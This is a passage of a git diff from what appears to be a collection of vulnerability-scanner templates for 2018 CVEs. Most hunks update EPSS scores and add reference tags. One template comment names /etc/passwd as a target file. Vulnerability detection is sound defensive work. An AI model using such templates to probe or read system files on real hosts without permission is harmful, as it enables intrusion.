-26,7 +28,7 @@ info: vendor: western_digital product: my_cloud_wdbctl0020hwt_firmware shodan-query: http.favicon.hash:-1074357885 - tags: cve,cve2018,auth-bypass,rce,wdcloud + tags: packetstorm,cve,cve2018,auth-bypass,rce,wdcloud http: - raw: diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 31aee92b5e..705588aee9 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17246 cwe-id: CWE-829,CWE-73 epss-score: 0.96913 - epss-percentile: 0.99595 + epss-percentile: 0.99615 cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index c042fc16a0..7e721bd365 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-17254 cwe-id: CWE-89 epss-score: 0.81793 - epss-percentile: 0.97937 + epss-percentile: 0.97985 cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index a8119475c3..54ec5d3cfc 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-17422 cwe-id: CWE-601 epss-score: 0.00118 - epss-percentile: 0.45103 + epss-percentile: 0.45486 cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index fc0f098193..7ccb3d02b5 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-17431 cwe-id: CWE-287 epss-score: 0.10458 - epss-percentile: 0.94254 + epss-percentile: 0.9435 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index 170c430715..5056578f60 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18069 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.42502 + epss-percentile: 0.4285 cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 28f69ae336..ba290b3418 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-18264 cwe-id: CWE-306 - epss-score: 0.97405 - epss-percentile: 0.99881 + epss-score: 0.97401 + epss-percentile: 0.99896 cpe: cpe:2.3:a:kubernetes:dashboard:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml index b5765e9727..c52d83a8af 100644 --- a/http/cves/2018/CVE-2018-18323.yaml +++ b/http/cves/2018/CVE-2018-18323.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-18323 cwe-id: CWE-22 epss-score: 0.97376 - epss-percentile: 0.99858 + epss-percentile: 0.99873 cpe: cpe:2.3:a:control-webpanel:webpanel:0.9.8.480:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml index 09f8ccea5c..cb63665b45 100644 --- a/http/cves/2018/CVE-2018-18570.yaml +++ b/http/cves/2018/CVE-2018-18570.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-18570 cwe-id: CWE-79 epss-score: 0.00098 - epss-percentile: 0.40032 + epss-percentile: 0.40337 cpe: cpe:2.3:a:planonsoftware:planon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index cfa7a538cc..47081c1ddc 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-18608 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54186 + epss-percentile: 0.54613 cpe: cpe:2.3:a:dedecms:dedecms:5.7:sp2:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml index a142d295d1..9ee4e0f5b4 100644 --- a/http/cves/2018/CVE-2018-18775.yaml +++ b/http/cves/2018/CVE-2018-18775.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18775 cwe-id: CWE-79 - epss-score: 0.00235 - epss-percentile: 0.60867 + epss-score: 0.00223 + epss-percentile: 0.60306 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 74da5445c3..1ab92e25cf 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.3 cve-id: CVE-2018-18777 cwe-id: CWE-22 - epss-score: 0.00238 - epss-percentile: 0.61201 + epss-score: 0.00224 + epss-percentile: 0.60404 cpe: cpe:2.3:a:microstrategy:microstrategy_web:7:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 06e4aba825..cf4197e507 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-18778 cwe-id: CWE-200 epss-score: 0.95125 - epss-percentile: 0.99024 + epss-percentile: 0.99077 cpe: cpe:2.3:a:acme:mini-httpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index 9a51288ed7..2ac08f6658 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-18809 cwe-id: CWE-22 epss-score: 0.46465 - epss-percentile: 0.96953 + epss-percentile: 0.9703 cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:* metadata: verified: true @@ -28,7 +28,7 @@ info: vendor: tibco product: jasperreports_library shodan-query: html:"jasperserver-pro" - tags: packetstorm,cve,cve2018,lfi,kev,jasperserver,jasperreport + tags: packetstorm,seclists,cve,cve2018,lfi,kev,jasperserver,jasperreport http: - method: GET diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index dd331fb52b..269da6a7d1 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-18925 cwe-id: CWE-384 - epss-score: 0.13227 - epss-percentile: 0.94833 + epss-score: 0.09538 + epss-percentile: 0.94077 cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml index 1ad9c457c0..da21815270 100644 --- a/http/cves/2018/CVE-2018-19136.yaml +++ b/http/cves/2018/CVE-2018-19136.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19136 cwe-id: CWE-79 - epss-score: 0.00247 - epss-percentile: 0.61938 + epss-score: 0.00151 + epss-percentile: 0.51048 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index 444d0d5ac8..e770fa12bd 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19137 cwe-id: CWE-79 epss-score: 0.0008 - epss-percentile: 0.33312 + epss-percentile: 0.33683 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index a00f827d5f..a2e2eacafe 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2018-19287 cwe-id: CWE-79 - epss-score: 0.82305 - epss-percentile: 0.97953 + epss-score: 0.64483 + epss-percentile: 0.97493 cpe: cpe:2.3:a:ninjaforma:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index b5596e6a16..d62968d6b6 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19326 cwe-id: CWE-22 - epss-score: 0.01394 - epss-percentile: 0.84719 + epss-score: 0.01158 + epss-percentile: 0.83287 cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 3bc4c1bd4b..68fc712230 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19365 cwe-id: CWE-22 epss-score: 0.01616 - epss-percentile: 0.85867 + epss-percentile: 0.8601 cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index c8cf32bdcc..4c45b5b7a3 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00205 - epss-percentile: 0.57738 + epss-percentile: 0.58143 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index 0b22244cc8..6cde58080f 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-19439 cwe-id: CWE-79 epss-score: 0.01135 - epss-percentile: 0.82901 + epss-percentile: 0.83096 cpe: cpe:2.3:a:oracle:secure_global_desktop:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 5740248ca0..466bb481d3 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 - epss-score: 0.10992 - epss-percentile: 0.9438 + epss-score: 0.08619 + epss-percentile: 0.9376 cpe: cpe:2.3:a:php-proxy:php-proxy:3.0.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 2e976b03d9..4ebd5530ec 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19749 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51378 + epss-score: 0.0011 + epss-percentile: 0.437 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml index 660a41d241..c3ee44d1bb 100644 --- a/http/cves/2018/CVE-2018-19751.yaml +++ b/http/cves/2018/CVE-2018-19751.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19751 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51378 + epss-score: 0.0011 + epss-percentile: 0.437 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 23683ce194..5faab0f128 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19752 cwe-id: CWE-79 - epss-score: 0.00156 - epss-percentile: 0.51378 + epss-score: 0.0011 + epss-percentile: 0.437 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index d2613321b6..6c51ef4839 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-19753 cwe-id: CWE-22 - epss-score: 0.01061 - epss-percentile: 0.82317 + epss-score: 0.00881 + epss-percentile: 0.80655 cpe: cpe:2.3:a:oracle:tarantella_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml index 1288f9a019..bddd7a5b29 100644 --- a/http/cves/2018/CVE-2018-19877.yaml +++ b/http/cves/2018/CVE-2018-19877.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19877 cwe-id: CWE-79 epss-score: 0.00268 - epss-percentile: 0.63562 + epss-percentile: 0.63967 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml index 2a0220487a..0a202fc268 100644 --- a/http/cves/2018/CVE-2018-19892.yaml +++ b/http/cves/2018/CVE-2018-19892.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-19892 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.40768 + epss-percentile: 0.41069 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index 0a2ea63978..346c3ebfc6 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19914 cwe-id: CWE-79 - epss-score: 0.0025 - epss-percentile: 0.6216 + epss-score: 0.00176 + epss-percentile: 0.54468 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 23c58dc254..33eece74b5 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -17,8 +17,8 @@ info: cvss-score: 4.8 cve-id: CVE-2018-19915 cwe-id: CWE-79 - epss-score: 0.00185 - epss-percentile: 0.55039 + epss-score: 0.00176 + epss-percentile: 0.54468 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index d4f809c7e3..c7759ec5fb 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20009 cwe-id: CWE-79 epss-score: 0.0025 - epss-percentile: 0.6216 + epss-percentile: 0.62583 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml index 3e6c0186dc..496ad09af4 100644 --- a/http/cves/2018/CVE-2018-20010.yaml +++ b/http/cves/2018/CVE-2018-20010.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20010 cwe-id: CWE-79 epss-score: 0.0025 - epss-percentile: 0.6216 + epss-percentile: 0.62583 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml index 96fc7edf6a..0d56531278 100644 --- a/http/cves/2018/CVE-2018-20011.yaml +++ b/http/cves/2018/CVE-2018-20011.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.0025 - epss-percentile: 0.6216 + epss-percentile: 0.62583 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml index 3553bcee82..1731b73d96 100644 --- a/http/cves/2018/CVE-2018-20462.yaml +++ b/http/cves/2018/CVE-2018-20462.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20462 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.61735 + epss-percentile: 0.62163 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml index c8cb6a933e..8c66910a0e 100644 --- a/http/cves/2018/CVE-2018-20463.yaml +++ b/http/cves/2018/CVE-2018-20463.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2018-20463 cwe-id: CWE-22 - epss-score: 0.02026 - epss-percentile: 0.87475 + epss-score: 0.02048 + epss-percentile: 0.87707 cpe: cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 4b7b77f79f..6b5996c4de 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20470 cwe-id: CWE-22 epss-score: 0.61765 - epss-percentile: 0.97374 + epss-percentile: 0.97434 cpe: cpe:2.3:a:sahipro:sahi_pro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 5f4fcf7284..1c531c2191 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-20526 cwe-id: CWE-434 epss-score: 0.00794 - epss-percentile: 0.7941 + epss-percentile: 0.7963 cpe: cpe:2.3:a:roxyfileman:roxy_fileman:1.4.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-20608.yaml b/http/cves/2018/CVE-2018-20608.yaml index 2b37f2e880..37ddad398e 100644 --- a/http/cves/2018/CVE-2018-20608.yaml +++ b/http/cves/2018/CVE-2018-20608.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2018-20608 cwe-id: CWE-200 epss-score: 0.03654 - epss-percentile: 0.90503 + epss-percentile: 0.90617 cpe: cpe:2.3:a:txjia:imcat:4.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 112dfd0b74..2ce6e84f8f 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-20824 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58311 + epss-percentile: 0.5872 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 53df56cad1..cd25414eb4 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 - epss-score: 0.01113 - epss-percentile: 0.82735 + epss-score: 0.00922 + epss-percentile: 0.81144 cpe: cpe:2.3:a:payeezy:wp_payeezy_pay:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-2392.yaml b/http/cves/2018/CVE-2018-2392.yaml index 25239d8627..4c5093caeb 100644 --- a/http/cves/2018/CVE-2018-2392.yaml +++ b/http/cves/2018/CVE-2018-2392.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-2392 cwe-id: CWE-611 epss-score: 0.0032 - epss-percentile: 0.66795 + epss-percentile: 0.67168 cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* metadata: max-request: 1 @@ -96,4 +96,4 @@ http: status: - 200 -# file name - /etc/passwd \ No newline at end of file +# file name - /etc/passwd diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index b7b9fac828..b60482b7b1 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2018-2791 - epss-score: 0.03569 - epss-percentile: 0.90407 + epss-score: 0.02746 + epss-percentile: 0.89378 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index e08a3145a0..cbaf534999 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-2894 - epss-score: 0.9734 - epss-percentile: 0.99824 + epss-score: 0.97185 + epss-percentile: 0.99747 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 155180cdf3..da927d265c 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-3167 - epss-score: 0.01454 - epss-percentile: 0.85018 + epss-score: 0.01975 + epss-percentile: 0.87441 cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 08a4134021..4706e04ee5 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N cvss-score: 6.9 cve-id: CVE-2018-3238 - epss-score: 0.00332 - epss-percentile: 0.67419 + epss-score: 0.00471 + epss-percentile: 0.72827 cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index a3998b8bfb..0a4362d8d0 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2018-3714 cwe-id: CWE-22 epss-score: 0.00364 - epss-percentile: 0.68884 + epss-percentile: 0.69193 cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 364fd0adf1..093823a9b5 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2018-3760 cwe-id: CWE-200,CWE-22 epss-score: 0.05013 - epss-percentile: 0.91853 + epss-percentile: 0.91971 cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 6015f58d35..ae18d3e0bf 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2018-3810 cwe-id: CWE-287 epss-score: 0.8409 - epss-percentile: 0.9803 + epss-percentile: 0.98094 cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 0b1fb91c96..cc47cecab6 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-5230 cwe-id: CWE-79 epss-score: 0.00211 - epss-percentile: 0.58311 + epss-percentile: 0.5872 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index cb532547f1..f1ec9ea06f 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00295 - epss-percentile: 0.65386 + epss-percentile: 0.65742 cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 7cd3557aab..efb7dc0ae6 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5316 cwe-id: CWE-79 epss-score: 0.00175 - epss-percentile: 0.53966 + epss-percentile: 0.54392 cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 4838050190..69616ae6a3 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-5715 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46905 + epss-percentile: 0.47213 cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 3ebfdbd1d3..f231ccddf1 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.41482 - epss-percentile: 0.96813 + epss-percentile: 0.96867 cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 51685d4f02..689971d093 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - epss-percentile: 0.70146 + epss-percentile: 0.70473 cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 